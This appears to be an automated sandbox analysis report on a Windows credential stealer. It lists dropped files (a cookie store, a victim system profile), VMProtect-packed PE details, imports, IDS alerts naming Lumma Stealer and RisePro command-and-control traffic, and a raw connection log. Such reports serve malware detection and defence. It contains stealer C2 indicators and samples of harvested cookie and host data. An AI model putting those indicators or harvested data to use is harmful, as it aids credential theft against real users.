                                SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                MD5:271D5F995996735B01672CF227C81C17
                                SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                Malicious:false
                                Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\tMO4FVIc9l.exe
                                File Type:ASCII text, with very long lines (369), with CRLF line terminators
                                Category:dropped
                                Size (bytes):530
                                Entropy (8bit):6.005544722730675
                                Encrypted:false
                                SSDEEP:12:c7F2v4kMx/6UsMbf4/LJPhvkRj6a9kuEYTCRopYxOOVtouEYv:SCJyHXbfQJPh8RdkYiFoYv
                                MD5:987FB1A1830B0EB5C0D306F8A2DE9981
                                SHA1:8374E6320AD99C3FF177A9889F1AB75448F6EB19
                                SHA-256:5EF24A6CE57CA3048431555909EC23CD5494DA76845F84271946442249DDA891
                                SHA-512:9E2A48264084B79051FC275DD7780A5552B56220459A1CDDBE6F6A307FE0E5759AE20BC243D085D9734153879AC4E66233AB83F92551DD8092EABF85B16F2D15
                                Malicious:false
                                Preview:.google.com.TRUE./.TRUE.1712298002.NID.ENC893*_djEwx6CLkXLg8AuSZWCgylmAsMNnd1LSfbcL+IfCgMvX/m5IrzdSwxt6X6n5S6C7wCoUoWvuixZpzrMizGZc5ohIpmsvlOrGTOhFkQ4+lCF6fVH0QNPBBb27o2nXM8em7EAYS1bYZC2LV04SqpgyxJmdfFA7UyWUoK8kFZQDRl0vdOzWdvAoumw2skuCCtJC2oG3z3OYbLTLDbM7wYvVmfDeqtnZRihAAt+ptqI6cfY1a+KO9XP+4XkDSXW7JhsexYHBqzSSBmUisGZ7f9E=_DrTFYLsM7YVgEN6pCv/RXeb8Bq748EwHbsLCIGv1kEc=*...google.com.FALSE./.TRUE.1699078840.1P_JAR.ENC893*_djEwZKzV9KAslchfQWnVTck71JHMVRC24lvAWgdl5WpYIXlINsbQSVWzkKU=_DrTFYLsM7YVgEN6pCv/RXeb8Bq748EwHbsLCIGv1kEc=*..
                                Process:C:\Users\user\Desktop\tMO4FVIc9l.exe
                                File Type:ASCII text, with CRLF, LF line terminators
                                Category:dropped
                                Size (bytes):6111
                                Entropy (8bit):5.487317497437124
                                Encrypted:false
                                SSDEEP:96:xWf+ZORDlcBC1IUlzhg/8f7bzfkZbngHNUbg3x:x09pl84IUlzhS8f7bgZrQB
                                MD5:D4767E1EF41E7A3EC496E468EEEB972A
                                SHA1:FB432BAC0CA814BABA0C5FFE3FC4DB6F11D5DC3D
                                SHA-256:A6C7B7926715FFF955524D190283801A8E499387B1A18126F47660EF2096D2BB
                                SHA-512:A805239F687F49FA5EBA492C4C0FF844BD9C35416ECD57F1D72B79C743969BACABFDAAA0C5E83A7DA99922B06F64BA66337CF9B697811A519248DCF54C157E57
                                Malicious:false
                                Preview:Build: Default12..Version: 2.0....Date: Thu May 23 18:21:59 2024.MachineID: 9e146be9-c76a-4720-bcdb-53011b87bd06..GUID: {a33c7340-61ca-11ee-8c18-806e6f6e6963}..HWID: f731566c135856b59ca2490a54344cfc....Path: C:\Users\user\Desktop\tMO4FVIc9l.exe..Work Dir: C:\Users\user\AppData\Local\Temp\trixyDxygJpUhAdhw....IP: 8.46.123.175..Location: US, New York City..ZIP (Autofills): -..Windows: Windows 10 Pro [x64]..Computer Name: 648351 [WORKGROUP]..User Name: user..Display Resolution: 1280x1024..Display Language: en-CH..Keyboard Languages: English (United Kingdom) / English (United Kingdom)..Local Time: 23/5/2024 18:21:59..TimeZone: UTC-5....[Hardware]..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..CPU Count: 4..RAM: 8191 MB..VideoCard #0: Microsoft Basic Display Adapter....[Processes]..System [4]..Registry [92]..smss.exe [328]..csrss.exe [412]..wininit.exe [488]..csrss.exe [496]..winlogon.exe [560]..services.exe [632]..lsass.exe [652]..svchost.exe [752]..fontdrvhost.exe [780]..
                                Process:C:\Users\user\Desktop\tMO4FVIc9l.exe
                                File Type:Unicode text, UTF-8 text, with CRLF, LF line terminators
                                Category:dropped
                                Size (bytes):4897
                                Entropy (8bit):2.518316437186352
                                Encrypted:false
                                SSDEEP:48:4MMMMMMMMMMdMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMMMMdMMMMMMMM3:q
                                MD5:B3E9D0E1B8207AA74CB8812BAAF52EAE
                                SHA1:A2DCE0FB6B0BBC955A1E72EF3D87CADCC6E3CC6B
                                SHA-256:4993311FC913771ACB526BB5EF73682EDA69CD31AC14D25502E7BDA578FFA37C
                                SHA-512:B17ADF4AA80CADC581A09C72800DA22F62E5FB32953123F2C513D2E88753C430CC996E82AAE7190C8CB3340FCF2D9E0D759D99D909D2461369275FBE5C68C27A
                                Malicious:false
                                Preview:................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\tMO4FVIc9l.exe
                                File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):686328
                                Entropy (8bit):7.929372166128709
                                Encrypted:false
                                SSDEEP:12288:e7bEafFGDd/trS7dYDRjGHWGcCHJGjrH35JmPVJB/P4xp8CzutREoLZP:efEiFGD5icIdPVJFP4P9SnLZP
                                MD5:AA3BEDA3FF46F6670094E3737A76C1D5
                                SHA1:402698999DE8CFC709FEC83CE90B7F27DCE469A4
                                SHA-256:B27806032F618D05AA4B03E5C2079C678584CBF8498CF6CF51597CB82914D0EF
                                SHA-512:EB3114CFE79DC4B4CC080FFE3CAE006336C963200F8F3BBA602551F3CB8164FAE1ABEFEE908F2C6516A5538644B763C2FB4791E8511CEE1425345E70015E081A
                                Malicious:false
                                Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]..{......y.....=..t....j..m..$$..D.....6n.v6.D!..B.hl..d...!r.A$!!..&.`._....;u.s.=..+$8Z..j.s$..o}.w.6oc.,...q...*?.u.......j..{.2d.....9....~....Ez2..:.H.i.9........k......].?...._..=...O].i8..MJm..A.s.X...o.zN.:..W.H.....WU}..4..^..=.....WV....1/....^.Y..|G..........aS.....o?.z.....o>..o..~.....$.\pA..]".Y.%z.)..1z....{.^.....j.G.Z..|...q......:(.#...{.0.<...'.q..K.....c..{..$...w.......>...s.=a..1g...}.u.Y.zf...{/.....>.1..{.1......[......M,..!/.k3..9.q....Skc=.z.9.a.^....%.{..s3.&.{,.b..]......}.K;f..~....B}..R.G...w%z.....Y.........nw...{-L..3^7b...c~l..c.....]..X.Q.....=w.3...k`.....#..L.=.;.8&'...i..y....q.].....z&..c......O....s.a.....b-..q.qnJ\.[.GM.y...z'...>1.....s...<.l>...7......N...ru=....=F....9..h....2....%.7^...fr.^w...s.oR..)..:.zv.....0~..g....).-aL>sv.u...B.{.F.....N} G.c..x..xl......[M..gL^o....>Z;j.x.......N1.s.....
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:MS Windows registry file, NT/2000 or above
                                Category:dropped
                                Size (bytes):1835008
                                Entropy (8bit):4.468600281698291
                                Encrypted:false
                                SSDEEP:6144:4zZfpi6ceLPx9skLmb0fEZWSP3aJG8nAgeiJRMMhA2zX4WABluuNrjDH5S:uZHtEZWOKnMM6bFptj4
                                MD5:C0E94A8AEABB9EE2AEB5EB37F314463A
                                SHA1:DC11D8569A9DA910E88A8321A562A6FD8AB7593D
                                SHA-256:5EC30A12223F334773E4DFBB6D92D45E96E52A65723B3A323BD2A821BADFF9D9
                                SHA-512:536FE81FB97F6E200536D225B3308A9566947BC96D14C66E1C1DCA1245FE58F0090DC76CD6D5C00C8E226486D3B7EE9C5ED120E34BF61F84ED1A140A8A45E520
                                Malicious:false
                                Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...._..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.9639382810091615
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:tMO4FVIc9l.exe
                                File size:3'134'976 bytes
                                MD5:6bc7f3c7927f5fc13a4410f1770c2dfe
                                SHA1:4fd9306a40681e1f881168644f991c30824b02cc
                                SHA256:c6ec11a31d4c28480f4ee3cc744792e12d7919cfffff5b7ca86649c904b7abda
                                SHA512:15a8e425fc9838af7b4084343da464ca00a89fbbed4f70eb13d6e7d5f1970f646748e12fe0c2e12fb89165af57338c9625178282b277c3c5ce9773876bc65a3f
                                SSDEEP:49152:TkSSEjtKhmW9bkolQcTF9dbrYszEEUJcbl9YF7FqpSoEGUwXjLRd2xcSG:Ndj0kWNTFjvLL4RLoEajLLWcS
                                TLSH:E1E523856ACE1794C998E6345626FFFCB2791E956691CF1E17B83AC3E8F30308476843
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....iLf...............'.............a5...........@.......................... p.......0...@................................
                                Icon Hash:8596a1a0a1a1b171
                                Entrypoint:0x7561fa
                                Entrypoint Section:.vmp
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                Time Stamp:0x664C6914 [Tue May 21 09:27:48 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:6
                                OS Version Minor:0
                                File Version Major:6
                                File Version Minor:0
                                Subsystem Version Major:6
                                Subsystem Version Minor:0
                                Import Hash:7ad43923e3c89560dc5c9969c825cbc8
                                Instruction
                                push BA099D81h
                                pushfd
                                sub word ptr [esp+04h], 4126h
                                sub byte ptr [esp+04h], FFFFFF83h
                                call 00007F4531233334h
                                mov di, word ptr [edi]
                                jmp 00007F453137DBF4h
                                push 971AB90Ah
                                jmp 00007F4531162564h
                                mov ebx, A21C6468h
                                fldcw word ptr [ecx+3EB6B709h]
                                out dx, eax
                                in eax, dx
                                dec ebx
                                outsd
                                or dl, byte ptr [eax-40h]
                                sub byte ptr [esi], bh
                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x333fe00x12c.vmp
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x5af0000x152602.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x5ad0000x1a5c.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x2d70780x18.vmp
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x5ac7500x40.vmp
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x2b30000x84.vmp
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3841dc0x40.vmp
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000x15bbc80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rdata0x15d0000x27e320x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data0x1850000x49300x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .vmp0x18a0000x1286800x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .vmp0x2b30000x5880x600e1d0169b583e98ecd808079673ddf28cFalse0.06901041666666667data0.4313292015194326IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .vmp0x2b40000x2f8f200x2f900043475c9af5db159f2015ff17d810e504unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .reloc0x5ad0000x1a5c0x1c007d132d2a06f27fa211724c71b5599f4cFalse0.3662109375data5.734566063087419IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .rsrc0x5af0000x1526020x20003d38b4fa63b27814c5bc97e26f950b26False0.61572265625data6.135733770645974IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                MUI0x5af70c0x110data0.5551470588235294
                                MUI0x5af81c0x110data0.5551470588235294
                                WEVT_TEMPLATE0x5b0eac0x4f2data0.03823529411764706
                                RT_BITMAP0x5b13a00x1246eempty0
                                RT_BITMAP0x5c38100x1246eempty0
                                RT_BITMAP0x5d5c800x1246eempty0
                                RT_BITMAP0x5e80f00x1246eempty0
                                RT_BITMAP0x5fa5600x1246eempty0
                                RT_BITMAP0x60c9d00x1246eempty0
                                RT_BITMAP0x61ee400x27c0empty0
                                RT_BITMAP0x6216000x27c0empty0
                                RT_BITMAP0x623dc00x37b0empty0
                                RT_BITMAP0x6275700x37b0empty0
                                RT_BITMAP0x62ad200x1246eempty0
                                RT_BITMAP0x63d1900x1246eempty0
                                RT_BITMAP0x64f6000x1246eempty0
                                RT_BITMAP0x661a700x1246eempty0
                                RT_BITMAP0x673ee00x120d2empty0
                                RT_BITMAP0x685fb40x1246eempty0
                                RT_BITMAP0x6984240x7ef6empty0
                                RT_BITMAP0x6a031c0x39eempty0
                                RT_BITMAP0x6a06bc0x332empty0
                                RT_BITMAP0x6a09f00x247aempty0
                                RT_BITMAP0x6a2e6c0x552empty0
                                RT_BITMAP0x6a33c00x2462empty0
                                RT_BITMAP0x6a58240x1246eempty0
                                RT_BITMAP0x6b7c940x1246eempty0
                                RT_BITMAP0x6ca1040x28e36empty0
                                RT_BITMAP0x6f2f3c0x7ef6empty0
                                RT_BITMAP0x6fae340x33f2empty0
                                RT_BITMAP0x6fe2280x33daempty0
                                RT_ICON0x5af92c0x1060PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedRussianRussia0.8838263358778626
                                RT_GROUP_ICON0x5b098c0x14dataRussianRussia1.05
                                RT_MANIFEST0x5b09a00x50bXML 1.0 document, ASCII text, with CRLF line terminators0.42835011618900076
                                DLLImport
                                KERNEL32.dllGetVersionExA
                                USER32.dllwsprintfA
                                GDI32.dllCreateCompatibleBitmap
                                ADVAPI32.dllRegQueryValueExA
                                SHELL32.dllShellExecuteA
                                ole32.dllCoInitialize
                                WS2_32.dllWSAStartup
                                CRYPT32.dllCryptUnprotectData
                                SHLWAPI.dllPathFindExtensionA
                                gdiplus.dllGdipGetImageEncoders
                                SETUPAPI.dllSetupDiEnumDeviceInfo
                                ntdll.dllRtlUnicodeStringToAnsiString
                                RstrtMgr.DLLRmStartSession
                                KERNEL32.dllHeapAlloc, HeapFree, ExitProcess, GetModuleHandleA, LoadLibraryA, GetProcAddress
                                Language of compilation systemCountry where language is spokenMap
                                RussianRussia
                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                05/24/24-00:22:10.983112TCP2052775ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)49732443192.168.2.6188.114.96.3
                                05/24/24-00:22:20.530627TCP2052775ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)49745443192.168.2.6188.114.96.3
                                05/24/24-00:22:23.772643TCP2052775ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)49751443192.168.2.6188.114.96.3
                                05/24/24-00:22:22.518638TCP2052775ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)49747443192.168.2.6188.114.96.3
                                05/24/24-00:22:12.085167TCP2052775ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)49734443192.168.2.6188.114.96.3
                                05/24/24-00:22:05.782799TCP2052775ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)49721443192.168.2.6188.114.96.3
                                05/24/24-00:22:15.606325TCP2052775ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)49740443192.168.2.6188.114.96.3
                                05/24/24-00:22:14.912811TCP2052775ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)49739443192.168.2.6188.114.96.3
                                05/24/24-00:22:27.200612TCP2052775ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)49753443192.168.2.6188.114.96.3
                                05/24/24-00:21:54.577369TCP2049060ET TROJAN RisePro TCP Heartbeat Packet4971050500192.168.2.65.42.65.116
                                05/24/24-00:22:09.677486TCP2052775ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)49726443192.168.2.6188.114.96.3
                                05/24/24-00:22:13.704960TCP2052775ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)49736443192.168.2.6188.114.96.3
                                05/24/24-00:22:04.255674TCP2052775ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)49717443192.168.2.6188.114.96.3
                                05/24/24-00:22:28.906409TCP2052775ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)49755443192.168.2.6188.114.96.3
                                05/24/24-00:22:16.187312TCP2052775ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)49742443192.168.2.6188.114.96.3
                                05/24/24-00:22:03.520068TCP2052775ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)49715443192.168.2.6188.114.96.3
                                05/24/24-00:22:01.482311TCP2046269ET TROJAN [ANY.RUN] RisePro TCP (Activity)4971050500192.168.2.65.42.65.116
                                05/24/24-00:21:55.315556TCP2046267ET TROJAN [ANY.RUN] RisePro TCP (External IP)50500497105.42.65.116192.168.2.6
                                05/24/24-00:21:55.095747TCP2046266ET TROJAN [ANY.RUN] RisePro TCP (Token)50500497105.42.65.116192.168.2.6
                                05/24/24-00:22:06.685867TCP2052775ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)49723443192.168.2.6188.114.96.3
                                05/24/24-00:22:23.759277TCP2052775ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)49750443192.168.2.6188.114.96.3
                                05/24/24-00:22:17.527410TCP2052775ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)49744443192.168.2.6188.114.96.3
                                05/24/24-00:22:32.208689TCP2052775ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)49757443192.168.2.6188.114.96.3
                                05/24/24-00:22:03.499118UDP2052761ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (employhabragaomlsp .shop)6523753192.168.2.61.1.1.1
                                05/24/24-00:22:05.249068TCP2052775ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)49720443192.168.2.6188.114.96.3
                                05/24/24-00:22:25.432173TCP2052775ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)49752443192.168.2.6188.114.96.3
                                05/24/24-00:22:14.645862TCP2052775ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)49738443192.168.2.6188.114.96.3
                                05/24/24-00:22:05.172883TCP2052775ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)49719443192.168.2.6188.114.96.3
                                05/24/24-00:22:21.615908TCP2052775ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)49746443192.168.2.6188.114.96.3
                                05/24/24-00:22:15.797814TCP2052775ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)49741443192.168.2.6188.114.96.3
                                05/24/24-00:22:04.759337TCP2052775ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)49718443192.168.2.6188.114.96.3
                                05/24/24-00:22:14.452009TCP2052775ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)49737443192.168.2.6188.114.96.3
                                05/24/24-00:22:06.291359TCP2052775ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)49722443192.168.2.6188.114.96.3
                                05/24/24-00:22:27.489896TCP2052775ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)49754443192.168.2.6188.114.96.3
                                05/24/24-00:22:09.774730TCP2052775ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)49729443192.168.2.6188.114.96.3
                                05/24/24-00:22:06.824727TCP2052775ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)49724443192.168.2.6188.114.96.3
                                05/24/24-00:22:22.849766TCP2052775ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)49748443192.168.2.6188.114.96.3
                                05/24/24-00:22:30.450870TCP2052775ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)49756443192.168.2.6188.114.96.3
                                05/24/24-00:22:04.185732TCP2052775ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)49716443192.168.2.6188.114.96.3
                                05/24/24-00:22:17.199190TCP2052775ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)49743443192.168.2.6188.114.96.3
                                TimestampSource PortDest PortSource IPDest IP
                                May 24, 2024 00:21:54.507107973 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:21:54.516783953 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:21:54.516876936 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:21:54.577368975 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:21:54.582541943 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:21:55.095746994 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:21:55.137798071 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:21:55.227533102 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:21:55.227767944 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:21:55.232767105 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:21:55.315556049 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:21:55.356566906 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:21:55.491153002 CEST49711443192.168.2.634.117.186.192
                                May 24, 2024 00:21:55.491188049 CEST4434971134.117.186.192192.168.2.6
                                May 24, 2024 00:21:55.491276026 CEST49711443192.168.2.634.117.186.192
                                May 24, 2024 00:21:55.493891001 CEST49711443192.168.2.634.117.186.192
                                May 24, 2024 00:21:55.493912935 CEST4434971134.117.186.192192.168.2.6
                                May 24, 2024 00:21:55.987385035 CEST4434971134.117.186.192192.168.2.6
                                May 24, 2024 00:21:55.987483025 CEST49711443192.168.2.634.117.186.192
                                May 24, 2024 00:21:55.990895987 CEST49711443192.168.2.634.117.186.192
                                May 24, 2024 00:21:55.990909100 CEST4434971134.117.186.192192.168.2.6
                                May 24, 2024 00:21:55.991151094 CEST4434971134.117.186.192192.168.2.6
                                May 24, 2024 00:21:56.039720058 CEST49711443192.168.2.634.117.186.192
                                May 24, 2024 00:21:56.086492062 CEST4434971134.117.186.192192.168.2.6
                                May 24, 2024 00:21:56.205178022 CEST4434971134.117.186.192192.168.2.6
                                May 24, 2024 00:21:56.205295086 CEST4434971134.117.186.192192.168.2.6
                                May 24, 2024 00:21:56.205351114 CEST49711443192.168.2.634.117.186.192
                                May 24, 2024 00:21:56.207935095 CEST49711443192.168.2.634.117.186.192
                                May 24, 2024 00:21:56.207952976 CEST4434971134.117.186.192192.168.2.6
                                May 24, 2024 00:21:56.207967997 CEST49711443192.168.2.634.117.186.192
                                May 24, 2024 00:21:56.207973957 CEST4434971134.117.186.192192.168.2.6
                                May 24, 2024 00:21:56.320456028 CEST49712443192.168.2.6104.26.5.15
                                May 24, 2024 00:21:56.320494890 CEST44349712104.26.5.15192.168.2.6
                                May 24, 2024 00:21:56.320574045 CEST49712443192.168.2.6104.26.5.15
                                May 24, 2024 00:21:56.320871115 CEST49712443192.168.2.6104.26.5.15
                                May 24, 2024 00:21:56.320883989 CEST44349712104.26.5.15192.168.2.6
                                May 24, 2024 00:21:56.801606894 CEST44349712104.26.5.15192.168.2.6
                                May 24, 2024 00:21:56.801752090 CEST49712443192.168.2.6104.26.5.15
                                May 24, 2024 00:21:56.804095030 CEST49712443192.168.2.6104.26.5.15
                                May 24, 2024 00:21:56.804109097 CEST44349712104.26.5.15192.168.2.6
                                May 24, 2024 00:21:56.804354906 CEST44349712104.26.5.15192.168.2.6
                                May 24, 2024 00:21:56.805360079 CEST49712443192.168.2.6104.26.5.15
                                May 24, 2024 00:21:56.850501060 CEST44349712104.26.5.15192.168.2.6
                                May 24, 2024 00:21:57.023330927 CEST44349712104.26.5.15192.168.2.6
                                May 24, 2024 00:21:57.023423910 CEST44349712104.26.5.15192.168.2.6
                                May 24, 2024 00:21:57.023588896 CEST49712443192.168.2.6104.26.5.15
                                May 24, 2024 00:21:57.024374008 CEST49712443192.168.2.6104.26.5.15
                                May 24, 2024 00:21:57.024401903 CEST44349712104.26.5.15192.168.2.6
                                May 24, 2024 00:21:57.024420023 CEST49712443192.168.2.6104.26.5.15
                                May 24, 2024 00:21:57.024427891 CEST44349712104.26.5.15192.168.2.6
                                May 24, 2024 00:21:57.024940014 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:21:57.086596012 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:21:57.271173000 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:21:57.325335979 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:21:57.356900930 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:21:57.379394054 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:21:57.574260950 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:21:57.575522900 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:21:57.581285954 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:21:57.810528040 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:21:57.856724024 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:21:57.903733969 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:21:57.908840895 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:21:58.106719971 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:21:58.122690916 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:21:58.215354919 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:21:58.367794037 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:21:58.419261932 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.815742016 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.820621014 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:00.875350952 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.875369072 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.875382900 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.875392914 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.875403881 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.875415087 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.875426054 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.875437021 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.875447989 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.875459909 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:00.875469923 CEST50500497105.42.65.116192.168.2.6
